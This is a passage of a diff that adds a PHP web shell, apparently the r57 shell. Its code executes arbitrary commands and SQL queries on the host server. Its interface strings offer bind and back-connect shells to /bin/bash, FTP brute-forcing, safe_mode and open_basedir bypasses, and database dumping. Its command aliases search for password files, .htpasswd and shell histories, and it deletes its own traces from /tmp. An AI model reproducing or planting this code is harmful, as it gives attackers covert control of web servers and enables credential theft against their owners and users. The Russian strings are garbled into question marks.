+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];	
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#e4e0d8>';
+ if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else 
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";	
+   else
+    {
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5)
+      {	
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;	
+       case '1': 
+       if($sql->get_result())
+        {
+       	echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+       	$keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>"; 
+        }
+       break;	
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); 
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;	 	
+       }	
+      }
+     }
+    }
+   }   
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; 
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }	
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'???? . ???????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+'ru_text111'=>'SQL-?????? : ????',
+'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
+'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
+'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
+'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
+'ru_text116'=>'?????????? ????',
+'ru_text117'=>'?',
+'ru_text118'=>'???? ??????????',
+'ru_text119'=>'?? ??????? ??????????? ????',
+'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
+'ru_err1'=>'??????! ?? ???? ????????? ???? ',
+'ru_err2'=>'??????! ?? ??????? ??????? ',
+'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
+'ru_err4'=>'?????? ??????????? ?? ftp ???????',
+'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
+'ru_err6'=>'??????! ?? ??????? ????????? ??????',
+'ru_err7'=>'?????? ??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_butt14'=>'Download',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'FTP-server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without archivation',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu) login for password',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_butt15'=>'Send',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
+'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! Can\'t sent mail',
+'eng_err7'=>'Mail send',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users'])) 
+ { 
+ if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else 
+  { 
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); 
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ { 
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); } 
+ if(empty($os)){ $os ="-"; $unix=1; } 
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die(); 
+  }                                                          
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;	
+  foreach ($rows as $string)
+   {
+   	$user = @explode(":",$string);
+   	if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users; 	
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';	
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err(0);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }	
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
